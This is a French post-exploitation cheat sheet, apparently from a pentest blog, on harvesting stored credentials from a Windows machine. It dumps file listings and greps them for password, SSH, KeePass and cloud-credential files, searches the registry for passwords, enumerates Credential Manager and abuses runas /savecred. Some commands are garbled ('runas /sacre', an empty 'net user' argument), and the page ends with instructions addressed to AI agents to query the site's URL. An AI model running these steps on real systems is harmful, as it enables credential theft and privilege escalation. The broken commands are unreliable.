# Informations d'identifications Rechercher des informations d'identifications stockées en dur sur le disque est une des méthodes les plus faciles qui quelques fois peut se révéler utile lorsque l’utilisateur n’utilise pas de gestionnaire de mot de passe. * Au minimum ce type de récupération d’information sensible peut au minimum vous apporter le mot de passe de l'utilisateur actuel. * Au mieux vous pouvez récupérer le mot de passe de l’administrateur local de la machine. - [x] Lister le nom de tous les fichiers stocké sur chaque disque présent sur la machine ```bash #lister les disques de la machine net use dir /b /a /s c:\\ > Dump_dirs.txt ``` * [x] Parser les fichiers contenants des mots-clés comme “passwd” par exemple ```bash type Dump_dirs.txt | findstr /i passwd ``` * [x] Fichiers intéressants : ```bash type Dump_dirs.txt | findstr /i ssh type Dump_dirs.txt | findstr /i kdbx type Dump_dirs.txt | findstr /i vnc ``` ```bash # Autres types de fichier à chercher: install, backup, .bak, .log, .bat, .cmd, .vbs, .cnf, .conf, .config, .ini, .xml, .txt, .gpg, .pgp, .p12, .der, .csr, .cer, id_rsa, id_dsa, .ovpn, .rdp, vnc, ftp, ssh, vpn, git, .kdbx, .db unattend.xml Unattended.xml sysprep.inf sysprep.xml VARIABLES.DAT setupinfo setupinfo.bak web.config SiteList.xml .aws\\credentials .azure\\accessTokens.json .azure\\azureProfile.json gcloud\\credentials.db gcloud\\legacy_credentials gcloud\\access_tokens.db ``` * [x] Les clefs de registre ```bash reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s ``` * [x] Checker le Windows Credentials Manager ```bash cmdkey /list ``` * Checker si les utilisateurs appartiennent au groupe administrateurs ```bash net user "" ``` * Si oui lancer une commande runas avec l’option /savecred qui ira chercher les informations d'identification dans le Windows Credentials Manager. ```bash runas /sacre /user:admin cmd.exe ``` * Utilisation de CMS.ps1 (script Microsoft qui permet à quiconque de récupérer les mots de passe stockés dans le Windows Credentials Manager) ```bash powershell Import-Module cms.ps1 ; Enum-Creds ``` ## Références : {% embed url="" %} {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://blog.hacktive.bebzounette.com/systems/windows/informations-didentifications.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.